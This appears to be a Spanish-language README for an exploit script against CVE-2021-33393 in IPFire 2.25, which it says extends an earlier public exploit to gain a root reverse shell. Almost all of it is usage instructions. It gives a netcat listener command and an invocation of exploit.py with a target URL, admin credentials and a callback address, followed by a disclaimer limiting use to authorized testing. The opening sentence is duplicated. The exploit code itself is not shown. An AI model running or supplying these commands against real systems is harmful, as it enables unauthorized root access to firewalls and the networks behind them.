
Este exploit se basa en CVE-2021-33393 y fue construido sobre el exploit original de Mücahit Saratar, extendiéndolo para lograr una shell inversa con privilegios de root.
Este exploit se basa en CVE-2021-33393 (https://nvd.nist.gov/vuln/detail/CVE-2021-33393) y se construyó sobre el exploit original de Mücahit Saratar (https://github.com/KaanaryOverFlow/ipfire-2-25-auth-rce), extendiéndolo para lograr una reverse shell con privilegios de root.
Inicia un listener:
nc -lvnp 4444
Ejecuta el exploit:
python exploit.py https://192.168.0.10:444 admin 'admin@123' 192.168.0.11:4444
Este exploit es únicamente para fines educativos y pruebas de penetración autorizadas. No lo uses contra sistemas para los que no tengas permiso explícito de prueba. El autor no se hace responsable del mal uso.